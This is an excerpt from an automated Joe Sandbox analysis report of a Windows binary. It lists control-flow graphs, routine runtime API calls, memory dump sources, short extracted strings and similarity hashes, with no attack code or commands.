                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7699 6c9db925-6c9db939 call 6c9e15a2 7702 6c9db93f-6c9db947 7699->7702 7703 6c9db93b-6c9db93d 7699->7703 7704 6c9db949-6c9db950 7702->7704 7705 6c9db952-6c9db955 7702->7705 7706 6c9db98d-6c9db9ad call 6c9e171f 7703->7706 7704->7705 7709 6c9db95d-6c9db971 call 6c9e15a2 * 2 7704->7709 7707 6c9db957-6c9db95b 7705->7707 7708 6c9db973-6c9db983 call 6c9e15a2 CloseHandle 7705->7708 7714 6c9db9af-6c9db9b9 call 6c9cf9f2 7706->7714 7715 6c9db9bb 7706->7715 7707->7708 7707->7709 7708->7703 7721 6c9db985-6c9db98b GetLastError 7708->7721 7709->7703 7709->7708 7719 6c9db9bd-6c9db9c0 7714->7719 7715->7719 7721->7706
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E425F), ref: 6C9DB97B
                              • GetLastError.KERNEL32(?,00000000,?,6C9E425F), ref: 6C9DB985
                              • __dosmaperr.LIBCMT ref: 6C9DB9B0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 9b55e8c9c87ea686bca696b5bee546139243b8dc5dbb905fee4a96d76251562a
                              • Instruction ID: cf3c9b8300f34e6263b816115c7ed322690212adf99e720b55a53490fc2b4a8c
                              • Opcode Fuzzy Hash: 9b55e8c9c87ea686bca696b5bee546139243b8dc5dbb905fee4a96d76251562a
                              • Instruction Fuzzy Hash: D8014833A099A01AC305077A9855B9D27BD4FB7B3CF3A8749E825A7BC2CF60E8458250

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7944 6c9d0b9c-6c9d0ba7 7945 6c9d0bbe-6c9d0bcb 7944->7945 7946 6c9d0ba9-6c9d0bbc call 6c9cf9cc call 6c9d0120 7944->7946 7947 6c9d0bcd-6c9d0be2 call 6c9d0cb9 call 6c9d873e call 6c9d9c60 call 6c9db898 7945->7947 7948 6c9d0c06-6c9d0c0f call 6c9dae75 7945->7948 7957 6c9d0c10-6c9d0c12 7946->7957 7963 6c9d0be7-6c9d0bec 7947->7963 7948->7957 7964 6c9d0bee-6c9d0bf1 7963->7964 7965 6c9d0bf3-6c9d0bf7 7963->7965 7964->7948 7965->7948 7966 6c9d0bf9-6c9d0c05 call 6c9d47bb 7965->7966 7966->7948
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 381904dcffa6fe22e1d2d2b209cd2741109ea6c066c59c3728de80969f6f58cc
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: E1F0D132501E546ACB211A39AD00BCB36A89F7237CF139715E864B3ED0DB74F40AC6A2
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C5AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9C5AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: e05d6a140103f57a9a27d2f6514843646cd5295afc3cc0528ac6717de702f700
                              • Instruction ID: c7b3488b30616eeae667fc0ab7a99eaee9d2ee1ac0e692e12049830a8edeee3b
                              • Opcode Fuzzy Hash: e05d6a140103f57a9a27d2f6514843646cd5295afc3cc0528ac6717de702f700
                              • Instruction Fuzzy Hash: B2511671201B00DBE735CF25C585BE6BBE4BB18718F448A5CD4AA4BB91DB30F549CB82
                              APIs
                              • GetLastError.KERNEL32(6C9F6DD8,0000000C), ref: 6C9CEF52
                              • ExitThread.KERNEL32 ref: 6C9CEF59
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: f53e40e192f2aec3644924c997c1660da63f009b18ead301062e33c90641c91d
                              • Instruction ID: db1f36596117c72b035aa01fe80723093ad60d04a4c3c69c2228a84119cbbd75
                              • Opcode Fuzzy Hash: f53e40e192f2aec3644924c997c1660da63f009b18ead301062e33c90641c91d
                              • Instruction Fuzzy Hash: 45F0F671A00604AFDB04AFB0D80AAAE3B74FF61314F258649E016E7B41DF30E915CFA2
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 71f730a4e8cd326d9d02f9a15e646cfb3ea115d0785c939bafae6ad0be515e36
                              • Instruction ID: a32b063970125da91b1a019cac39e371468b1af4fb5ef7730b0dd634538de03a
                              • Opcode Fuzzy Hash: 71f730a4e8cd326d9d02f9a15e646cfb3ea115d0785c939bafae6ad0be515e36
                              • Instruction Fuzzy Hash: E2118C71A0420EAFCF05CF58E945ADB3BF8EF48304F058059F808AB301D631EA11CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: b7f64ba8aa6ad03ad2060edd71fba4f8aabbc9ad6c58320dd7e3bcb79c5a134a
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 49012C72C01159EFCF029FE88D009EE7FB5AF28214F144165BD24A26A0E731CA24DF91
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C9E4115,?,?,00000000,?,6C9E4115,00000000,0000000C), ref: 6C9E4474
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 35042d1862107f5f7e4a13900c2a1a3c71fad93f2a1c33bbc703c60c522b7cde
                              • Instruction ID: 36ae21765297044c2b5529216728c7bba629eca0377eb0207a73f906547b1dcd
                              • Opcode Fuzzy Hash: 35042d1862107f5f7e4a13900c2a1a3c71fad93f2a1c33bbc703c60c522b7cde
                              • Instruction Fuzzy Hash: 73D06C3210410DBBDF028E84DD06EDA3BAAFB88715F114010BA1856020C732E861AB90
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245016856.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2244991895.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246137276.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247689143.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: bd179ddf83c7baf4875261abab09029ac00b72b483bdcd4d358f0d04104174df
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA584B1
                                • Part of subcall function 6CA5993B: __EH_prolog.LIBCMT ref: 6CA59940
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 587ea0ec657757d328f40d1afe1e55b897992791714bbfe00bc23620a1ab3cfa
                              • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction Fuzzy Hash: 40F28E70D01248DFDB11CFA8C988BDDBBB5AF49308F288499E449EB791D7319A86CF11
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA4AEF4
                                • Part of subcall function 6CA4E622: __EH_prolog.LIBCMT ref: 6CA4E627
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction ID: 2bcd8dc0136d8ed2f227eb9f65ec2f2823ba1a7ccf36f5944796f5b65af6941d
                              • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction Fuzzy Hash: 74538930D01258DFDB15CFA8C994BEDBBB4AF19308F2481D8D44AA7691DB70AE89CF51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction ID: 235437574d0a59d525b8d1362dd333cabcb24bd4d7608e4421e462414f1e2a9f
                              • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction Fuzzy Hash: E4E2CF70D05249DFEF01CFA8C658BDDBBB0AF0930CF688099E855ABA81C774D995CB61
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA26CE5
                                • Part of subcall function 6C9FCC2A: __EH_prolog.LIBCMT ref: 6C9FCC2F
                                • Part of subcall function 6C9FE6A6: __EH_prolog.LIBCMT ref: 6C9FE6AB
                                • Part of subcall function 6CA26A0E: __EH_prolog.LIBCMT ref: 6CA26A13
                                • Part of subcall function 6CA26837: __EH_prolog.LIBCMT ref: 6CA2683C
                                • Part of subcall function 6CA2A143: __EH_prolog.LIBCMT ref: 6CA2A148
                                • Part of subcall function 6CA2A143: ctype.LIBCPMT ref: 6CA2A16C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction ID: bd4256071ecbbb364350c8e152a019a7c419b5e2c25b9454b5692bef73632657
                              • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction Fuzzy Hash: 0303CC318052A8DEDF15CFA4C940BDCBBB1AF25308F284099E455A7A91DB789BCDDF21
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3J$`/J$`1J$p0J
                              • API String ID: 0-2826663437
                              • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction ID: d2d4ff34eceb0455ac57a74f9b5a180bdf696cbfc94d60c43bf0c7ddd883dca9
                              • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction Fuzzy Hash: DB41F572F10A201AB3488E6A8C855667FC3C7CA347B4AC33DD565CA6D9DABDC44782A4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: W
                              • API String ID: 3519838083-655174618
                              • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction ID: 5d9a408a9df833af7b78673180577e3e35afc3b040b78417b576e06b3d7bb536
                              • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction Fuzzy Hash: 02B28D70A01259DFDB00CFA8C584BADBBB4BF09308F688099E945EB742C775ED95CB60
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA4489B
                                • Part of subcall function 6CA45FC9: __EH_prolog.LIBCMT ref: 6CA45FCE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @ K
                              • API String ID: 3519838083-4216449128
                              • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction ID: e8e419e98d0ccd25c38ed7273534c45ff9e8f8797363653b19a4cae8c56b1f36
                              • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction Fuzzy Hash: DDD1E371D042188FDB14CFA9C5907DEB7B6FF84318F28C16AE415ABA84CB7498C6CB55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: x=J
                              • API String ID: 3519838083-1497497802
                              • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction ID: fcb2596a9aaeeb26f2a64524359ab2d0d5d757a02a41c3241e275c8bb0228e49
                              • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction Fuzzy Hash: A591D231D01109DADF04DFA5C890AEDB779AF2630CF25806AD47167A51DB32DA4BCB94
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                              • Instruction ID: c033c13a4019db5106c1cc29fffe7a84225c72784a805289cf95d4516ee0d476
                              • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                              • Instruction Fuzzy Hash: EAB28B30905658CFDB21CF6AC984BDEBBF1AF04308F184699D59AA7E81D770A9C9CF50
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: @4J$DsL
                              • API String ID: 0-2004129199
                              • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction ID: abe59578e74036ba5027e1c419ad6f4f8656b06ccddbf8c77254b7e73dd9e00c
                              • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction Fuzzy Hash: BC218F376A49560BD74CCA28DC33AB936C1E745305B88527EE94BCB3D1DE5C8800C648
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                              • Instruction ID: 16abd2c7b805d021c12fd8ab1f305e847a31a83217702959e25cb51cc1922ba3
                              • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                              • Instruction Fuzzy Hash: B7F14870900249DFCB54CFA8D590BEDBBB1BF05318F24C16AD419ABB52D770AA89CF91
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                              • Instruction ID: df2d58b0b10c49df902acc9b971cfec06bb5c19f4dedcec7b8eeafc20f46c61b
                              • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                              • Instruction Fuzzy Hash: E53249B1A083058FC318CF5AC48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                              • Instruction ID: e71615345c89f6b48d1f4cc0389a12825f55da578c30f0a87d3bc15656fd7eec
                              • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                              • Instruction Fuzzy Hash: 1F1207B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311D770E9568BC6
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
